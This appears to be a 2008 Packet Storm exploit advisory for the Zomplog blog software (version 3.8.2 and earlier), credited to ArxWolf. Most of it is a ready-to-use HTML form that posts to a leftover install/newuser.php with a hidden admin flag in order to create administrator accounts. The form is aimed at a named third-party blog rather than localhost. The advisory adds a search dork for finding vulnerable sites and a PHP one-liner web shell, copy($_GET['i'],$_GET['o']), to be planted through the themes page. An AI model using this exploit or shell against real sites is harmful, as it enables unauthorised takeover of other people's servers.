zomplog-admin.txt

2008-05-19T00:00:00
ID PACKETSTORM:66468
Type packetstorm
Reporter ArxWolf
Modified 2008-05-19T00:00:00

Description

                                        
                                            `======================== WEBXAKEP.NET ===========================  
  
Name: "Zomplog 3.8.2 <= add admin"  
Version: All  
Script Download: http://www.zomp.nl/zomplog/  
DORK: "powered by zomplog"  
Discovered By: ArxWolf  
Discovered On: 16 05 2008  
WWW: http://WebXakep.net  
ICQ: 504-282  
  
Vulnerability to "install/newuser.php", to add 2 administrator.  
Folder "install" not removed in 70% of cases.  
  
Exploit:  
--------------------------------------------------------  
<br><b><center>Добавляем админа "Add Admin"</center></b><br><br>  
<!-- <form action="http://localhost/install/newuser.php" method="POST"> /-->  
<form action="http://weblog.sgrim.us/install/newuser.php" method="POST">  
<p>Титлы блога "Blog Title"<br />  
<input type="text" name="weblog_title" maxlength="40" id="blogname" />  
<br />  
<br />  
Логин "Username"<br />  
<input type="text" name="login" maxlength="15" id="name" />  
<br />  
<br />  
Пароль "Password"<br />  
<input type="password" name="password" maxlength="15" id="pwd" />  
<br />  
<br />  
Повторяем пароль "Confirm password"<br />  
<input type="password" name="password2" maxlength="15" id="pwd2" />  
<br />  
<br />  
<input name="admin" type="hidden" id="admin" value="1" />  
<input name="submit_user" type="submit" value="Submit ››" id="submit" />  
  
</p>  
</form>  
-------------------------------------------------------------  
  
http://******/admin/profile.php // Add or delete user ^_^  
http://******/admin/themes.php // If there is a right of entry you can fill shell. <?php copy($_GET['i'],$_GET['o']); ?>  
  
  
========================= WEBXAKEP.NET ===========================  
  
`